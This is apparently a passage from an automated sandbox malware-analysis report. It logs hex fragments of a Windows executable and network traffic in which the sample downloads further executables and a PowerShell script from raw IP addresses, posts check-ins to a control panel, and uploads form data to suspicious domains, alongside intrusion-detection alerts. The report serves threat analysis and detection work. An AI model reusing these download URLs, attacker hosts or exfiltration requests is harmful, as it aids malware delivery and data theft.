00 00 00 e3 05 00 18 00 00 00 10 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ea f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 17:11:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 04:18:30 GMTETag: "1d2400-62fb8ea3d513f"Accept-Ranges: bytesContent-Length: 1909760Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cc 41 c8 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 46 22 00 00 00 00 00 00 d0 6f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 6f 00 00 04 00 00 6c 8b 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2f 00 00 c0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 62 6c 6f 78 73 6d 6b 00 b0 1b 00 00 20 54 00 00 a6 1b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 63 6a 77 62 71 70 00 10 00 00 00 d0 6f 00 00 02 00 00 00 22 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: GET /f/packed.exe HTTP/1.1Host: pulseon.top
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveHost: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                              Source: global trafficHTTP traffic detected: GET /files/7212159662/HmngBpR.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 38 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111840101&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 32 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10112790101&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/8032894631/9hUDDVk.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 34 34 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10114440101&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/5153162918/pwHxMTy.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 34 36 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10114630101&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/6491397189/T0QdO0l.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 35 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10115790101&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/7853925217/ogfNbjS.ps1 HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 39 35 39 30 31 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10119590141&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /test/amnew.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 31 36 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10121660101&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/5149365135/bncn6rv.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 37 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10122730101&unit=246122658369
                              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                              Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49698 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 104.21.48.1:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49704 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49718 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49717 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49720 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 176.113.115.7:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49733 -> 104.21.48.201:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49727 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49729 -> 104.21.112.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49738 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49759 -> 104.21.48.201:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 140.82.121.4:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49736 -> 82.115.223.119:443
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=pu73agfU4ebSVvpoIZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14508Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hO14yMOjbPAhUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15040Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=198fOZJDCuCQU0zaxR1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20400Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=pyhX63gwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2457Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=gntS2y4q6Od9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 576430Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: defaulemot.run
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=w3jLG0ge3eXd6MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14478Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6RA1Fyx7VwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15020Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=74KcwAAi5R92ahpIvDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20390Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BK9qLZgJz987b1uYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2547Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AB2Vm5wJ4ALfE3haht2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566536Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /LksNAz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: fostinjec.today
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: agroecologyguide.digital
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /f/packed.exe HTTP/1.1Host: pulseon.top
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveHost: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /files/7212159662/HmngBpR.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /files/8032894631/9hUDDVk.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /files/5153162918/pwHxMTy.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /files/6491397189/T0QdO0l.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /files/7853925217/ogfNbjS.ps1 HTTP/1.1Host: 176.113.115.7
                              Source: global trafficHTTP traffic detected: GET /test/amnew.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /files/5149365135/bncn6rv.exe HTTP/1.1Host: 176.113.115.7
                              Source: global trafficDNS traffic detected: DNS query: defaulemot.run
                              Source: global trafficDNS traffic detected: DNS query: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR
                              Source: global trafficDNS traffic detected: DNS query: fostinjec.today
                              Source: global trafficDNS traffic detected: DNS query: techspherxe.top
                              Source: global trafficDNS traffic detected: DNS query: agroecologyguide.digital
                              Source: global trafficDNS traffic detected: DNS query: pulseon.top
                              Source: global trafficDNS traffic detected: DNS query: www.google.com
                              Source: global trafficDNS traffic detected: DNS query: explorebieology.run
                              Source: unknownHTTP traffic detected: POST /jUSiaz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: defaulemot.run
                              Source: 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7//
                              Source: 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7//Ky
                              Source: 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/Yy
